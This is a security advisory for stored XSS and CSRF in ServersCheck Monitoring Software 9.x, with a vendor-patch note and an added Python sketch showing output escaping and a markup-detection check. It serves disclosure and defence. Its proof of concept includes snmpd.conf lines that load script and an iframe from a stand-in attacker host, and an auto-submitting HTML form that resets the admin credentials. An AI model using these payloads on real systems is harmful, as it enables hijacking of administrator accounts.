Release date:
Updated on:
Affected Systems:
ServersCheck Monitoring Software 9.x
Description:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software is a network monitoring and server monitoring software package.
ServersCheck Monitoring Software has a security vulnerability: input passed through the "syslocation" and "syscontact" parameters is not properly filtered before it is displayed to the user, so attackers can insert arbitrary HTML and script code.
<* Source: loneferret
Link: http://secunia.com/advisories/50959/
http://www.exploit-db.com/exploits/21866/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
# PoC:
# Stored XSS & Cross Site Request Forgery
# The XSS is triggered by an snmpd.conf file that points to an attacker-controlled
# JavaScript file.
#..
# syslocation <script src="http://attacker/xss.js"></script>
# syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>
# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body onload="trigger()">
<script>
function trigger() {
  document.getElementById('bad_form').submit();
}
</script>
<form id="bad_form" method="post" action="http://target:1272/settings2.html">
<input name="systemsetting" value="secure" type="hidden">
<input name="setting" value="SECURE" type="hidden">
<input value="OK" name="changedsettings" type="hidden">
<input name="systemsetting" value="SECURE" type="hidden">
<input name="XYXadminuser" size="30" value="loneferret" type="hidden"><br>
<input name="adminpass" size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
ServersCheck Monitoring Software
--------------------------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.serverscheck.dk/monitoring_software/release.asp
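Added example (not from the advisory or the vendor's code): a Python sketch of the filtering flaw described above, showing a status-page row that embeds SNMP-supplied "syslocation" and "syscontact" values unescaped, the same row with output encoding, and a check that flags active markup in those fields. The function names, the table layout and the sample device records are assumptions made for illustration.

```python
import html
import re

# Constructed sample of values a monitored device might return over SNMP.
# The field names come from the advisory; the records are illustrative.
SAMPLE_DEVICES = [
    {"host": "10.0.0.5", "syslocation": "Rack 12, DC-East",
     "syscontact": "noc@example.org"},
    {"host": "10.0.0.9",
     "syslocation": '<script src="http://attacker/xss.js"></script>',
     "syscontact": "Ops <ops@example.org>"},
]

# Tags, event handlers and URL schemes that do not belong in a
# location or contact string.
MARKUP = re.compile(
    r"<\s*/?\s*(script|iframe|img|svg|object|embed|form)\b"
    r"|\bon\w+\s*=|javascript:", re.I)


def render_unsafe(device):
    """The flawed pattern: device-supplied strings are pasted into the page."""
    return ("<tr><td>{host}</td><td>{syslocation}</td>"
            "<td>{syscontact}</td></tr>").format(**device)


def render_safe(device):
    """Same row with every device-supplied value HTML-encoded on output."""
    cells = (html.escape(str(device[k]), quote=True)
             for k in ("host", "syslocation", "syscontact"))
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


def suspicious_fields(device):
    """Return the names of SNMP string fields that contain active markup."""
    return [k for k in ("syslocation", "syscontact")
            if MARKUP.search(str(device.get(k, "")))]


if __name__ == "__main__":
    for dev in SAMPLE_DEVICES:
        print(dev["host"], "flagged:", suspicious_fields(dev))
        print("  unsafe:", render_unsafe(dev))
        print("  safe:  ", render_safe(dev))
```

Encoding on output, rather than stripping angle brackets on input, keeps a legitimate contact such as "Ops <ops@example.org>" readable while rendering injected markup inert.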